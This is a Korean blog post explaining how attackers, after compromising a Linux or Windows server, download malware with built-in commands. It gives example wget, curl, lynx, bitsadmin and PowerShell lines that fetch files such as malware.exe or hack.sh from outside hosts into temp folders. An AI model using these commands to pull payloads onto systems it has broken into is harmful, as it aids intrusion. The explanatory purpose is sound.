Skip to content

minority opinions

Menu
  • Home
  • 꿀팁정리 & 자기계발
  • 기술 정보 & 테크 소식
  • 이슈 뉴스 정리
  • 주식 경제
  • Tags
Menu

악성코드 파일 다운로드 명령어 / wget / curl / lynx / bitsadmin

Posted on 6월 26, 20217월 8, 2023 by Daniel J.

해커가 보안 취약점을 이용하여 시스템 장악후 외부 사이트로 부터 어떤 방법을 이용하여 악성코드를 다운로드 할까요? 가장 보편적인 방법으로는 OS 자체 명령어를 사용 하여 악성코드를 다운로드 합니다.

전제 조건 

  • 보안 취약점을 이용하여 시스템 장악 완료
  • OS (LINUX, Windows) 기본 명령어를 제어 할수 있는 권한 획득
  • 피해 서버 <-> 아웃바운드(인터넷) 네트워크 통신 가능 상태

Linux OS 

wget 명령어 파일 다운로드 

wget https://min.tistory.com/code.sh 

wget https://min.tistory.com/code.sh -P files/download -O hack.sh

-P 디렉토리 저장
-O 파일명 지정
-b 백그라운드 실행

curl 명령어 파일 다운로드

curl https://min.story.com/download/malware.exe -o malware.exe

curl -O https://min.story.com/download/malware.sh .

curl -O https://min.story.com/download/malware.sh > /tmp/malware.sh

lynx 명령어 파일 다운로드

 lynx -source https://min.story.com/sitemap.xml > sitemap.xml

[모의해킹/취약점분석] 해킹 공격 유형 분석

Windows OS

bitsadmin 명령어 파일 다운로드

bitsadmin /transfer 작업명 /download 받는 파일URL 로컬경로파일

bitsadmin / transfer myjob01 / download / priority normal
https://mi.story.com/test.exe c:\windows\temp\hackfile.exe

powershell 파일 다운로드

$client = New-Object System.Net.WebClient 
$client.DownloadFile("http://91.x1.1x.10x/TWsTWqgRFxxxxx.exe","C:\Windows\TEMP\CAU81xxx.exe")

명령어별로 수없이 다양한 옵션이 있지만 기본적인 옵션에 대해서만 설명하였습니다. 부디 도움이 되길 바랍니다.

이 글 공유하기:

  • 페이스북에 공유하려면 클릭하세요. (새 창에서 열림) Facebook
  • 클릭하여 X에서 공유 (새 창에서 열림) X
  • 인쇄하기 (새 창에서 열림) 인쇄
  • 클릭하여 친구에게 이메일로 링크 보내기 (새 창에서 열림) 전자우편
  • Telegram에 공유하려면 클릭하세요. (새 창에서 열림) Telegram
  • WhatsApp에 공유하려면 클릭하세요. (새 창에서 열림) WhatsApp

이것이 좋아요:

좋아하기 가져오는 중...

관련

답글 남기기 응답 취소

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다

Category

  • Article (66)
  • Uncategorized (162)
  • 게임 소식 (13)
  • 기술 정보 & 테크 소식 (261)
  • 꿀팁정리 & 자기계발 (323)
  • 블로그 (27)
  • 사건 사고 (64)
  • 역사 (38)
  • 영화 & 드라마 & 애니메이션 (27)
  • 이슈 뉴스 정리 (207)
  • 정치 인물 사회 (125)
  • 주식 경제 (119)

Recent Posts

  • 인터넷 속도제한 QoS 풀기 해제 기가인터넷 KT GiGA 인터넷의 일일 150GB QoS제한 우회 팁

    인터넷 속도제한 QoS 풀기 해제 기가인터넷 KT GiGA 인터넷의 일일 150GB QoS제한 우회 팁

    6월 4, 2025
  • 티스토리 애드센스 앵커광고 오퍼월 광고 설정 불가 안내와 중단 설정방법

    티스토리 애드센스 앵커광고 오퍼월 광고 설정 불가 안내와 중단 설정방법

    6월 2, 2025
  • 이재명 아들 이동호 공소장과 범죄일람표 약식명령문 공개

    이재명 아들 이동호 공소장과 범죄일람표 약식명령문 공개

    5월 27, 2025
  • 위고비(Wegovy) 효능과 가격(1펜) 정리

    위고비(Wegovy) 효능과 가격(1펜) 정리

    2월 16, 2025
  • 도메인 URL 주소 단축하는 사이트 모음

    도메인 URL 주소 단축하는 사이트 모음

    1월 30, 2025

Popular Posts

©2025 minority opinions | Design: Newspaperly WordPress Theme
%d